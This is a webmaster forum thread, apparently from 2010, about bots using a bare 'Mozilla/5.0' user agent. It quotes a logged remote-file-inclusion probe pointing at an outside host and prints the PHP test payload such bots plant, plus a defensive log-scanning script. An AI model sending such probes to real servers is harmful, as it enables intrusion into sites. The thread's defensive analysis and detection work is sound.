
Help identify attack tool with user agent: "Mozilla/5.0"

Server exploit attacks from APNIC use this user agent

3:52 pm on Feb 27, 2010 (gmt 0)

Full Member

10+ Year Member

joined:May 5, 2003
posts: 319
votes: 0


I am trying to get some details about a thorn in my server-side ;-)

For a couple of years I have been blocking attack bots with the exact user agent: "Mozilla/5.0"

There must be a hacktool with that default UA, but I cannot find any details about it.

Evidence (from Korean IP space):

218.38.xyz.xyz - - [26/Feb/2010:23:00:14 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://example.com/columbus/heheh.txt? HTTP/1.1" 403 421 "-" "Mozilla/5.0"

Do any of you guys know what hack tool uses that default user agent? Most of these attacks have APNIC IP addresses, which I look up, convert into CIDRs, and add to my .htaccess and iptables Chinese Blocklists. The exploits are blocked by various rules in my .htaccess. I'm just curious about this user agent.

Thanks in advance; Wiz

[edited by: incrediBILL at 8:17 pm (utc) on Feb 27, 2010]
[edit reason] removed specifics to live bot net [/edit]

4:02 pm on Feb 27, 2010 (gmt 0)

System Operator from US 

incredibill

joined:Jan 25, 2005
posts:14664
votes: 99


That's just a standard bot net attempting to upload a file to your server.

I get about 50+ of those every day for years now.

7:35 pm on Feb 27, 2010 (gmt 0)

Senior Member


joined:Dec 27, 2004
posts:1995
votes: 75


Wizcrafts, I see those on an hourly basis as well. Ask yourself a question: Do I have any files on the server that end with ".txt"? That is all there is to it.

added: besides robots.txt

7:47 pm on Feb 27, 2010 (gmt 0)

Full Member

10+ Year Member

joined:May 5, 2003
posts:319
votes: 0


Guys;
I am already blocking all such exploit attacks. I was only asking if anybody knows what the actual hack tool might be, which has a default user agent of "Mozilla/5.0"? I am trying to identify the tool, not the attack vector.

8:16 pm on Feb 27, 2010 (gmt 0)

System Operator from US 

incredibill

joined:Jan 25, 2005
posts:14664
votes: 99


Do I have any files on the server that end with ".txt"? That is all to it.


That's not it at all.

The file "http://example.com/columbus/heheh.txt" is a ping script residing on a compromised server they are attempting to upload into your server.

This is an active bot net running a live test for servers that respond.

The file heheh.txt looks like this:
<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>


If your server echoes that text then they flag your server for a return trip by the hacker.

I was only asking if anybody knows what the actual hack tool might be


It's just a standard bot net script, tons of them, many variations, no specific tool.
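A small log triage script, added here as an illustration and not code from anyone in the thread, that picks out the two things discussed above from combined-format access logs: query parameters carrying a remote URL (the `_SERVER[DOCUMENT_ROOT]=http://...heheh.txt?` probe in the evidence line) and the bare "Mozilla/5.0" user agent, rating a probe higher when the server answered 200 rather than 403. The sample log lines and their IPs are constructed (documentation ranges); only the request string is taken from the thread.

```python
import re
from urllib.parse import parse_qsl

# Apache "combined" log format, the layout of the evidence line quoted in the thread.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) '
    r'(?P<target>\S+) [^"]+" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# Bare browser tokens with no platform or version detail, as discussed in the thread.
BARE_UAS = {"Mozilla/5.0", "Mozilla/4.0"}

# Constructed sample lines (documentation IPs); the first copies the thread's request.
SAMPLE_LOG = """\
203.0.113.5 - - [26/Feb/2010:23:00:14 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://example.com/columbus/heheh.txt? HTTP/1.1" 403 421 "-" "Mozilla/5.0"
203.0.113.7 - - [27/Feb/2010:01:12:03 -0700] "GET /index.php?page=http://example.net/id.txt? HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.9 - - [27/Feb/2010:02:00:00 -0700] "GET /robots.txt HTTP/1.1" 200 64 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:3.6) Gecko/20100101 Firefox/3.6"
"""

def parse_line(line):
    """Split one combined-format line into fields, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def rfi_params(target):
    """Query parameters whose value is a remote URL: the remote-file-inclusion probe shape."""
    _, _, query = target.partition("?")
    return [(k, v) for k, v in parse_qsl(query, keep_blank_values=True)
            if v.lower().startswith(("http://", "https://", "ftp://"))]

def classify(entry):
    """Findings for one parsed entry as (kind, severity, detail) tuples."""
    findings = []
    for key, value in rfi_params(entry["target"]):
        # A 403 means the rules in front of the server refused the probe; a 200
        # means it was served, so the response is worth checking for the echoed
        # marker string the test file would produce.
        severity = "high" if entry["status"] == "200" else "blocked"
        findings.append(("rfi-probe", severity, f"{key} -> {value}"))
    if entry["ua"] in BARE_UAS:
        findings.append(("bare-ua", "low", entry["ua"]))
    return findings

def scan(lines):
    """Run classify() over raw log lines; returns (ip, kind, severity, detail) per finding."""
    return [(e["ip"], *f) for e in map(parse_line, lines) if e for f in classify(e)]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG.splitlines()):
        print(*finding)
```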

8:47 pm on Feb 27, 2010 (gmt 0)

Full Member

10+ Year Member

joined:May 5, 2003
posts:319
votes: 0


Thanks for the explanation Bill.

9:00 pm on Feb 27, 2010 (gmt 0)

Senior Member from GB 

dstiles

joined:May 14, 2008
posts: 3277
votes: 19


Thanks for the explanation of the txt? files, Bill. Always wondered what they expected to find. :)

My experience, Wizcrafts, is that a simple Mozilla/4.0 or Mozilla/5.0 on its own is usually from the Chinese block, though I have seen a few from the Eastern European countries. They aren't always loaded for .txt? or php files and I've wondered if they may be an Oriental MSIE work-alike, but it's worth blocking them.

1:01 am on Feb 28, 2010 (gmt 0)

Senior Member


joined:Dec 27, 2004
posts:1995
votes: 75


Bill, you are absolutely right about botnets. What I mean is that any request my sites are asked to serve with a .txt extension is an instant candidate for "Naturally Delicious Dried Mangoes". 403 Calories per serving to start with... due to the fact.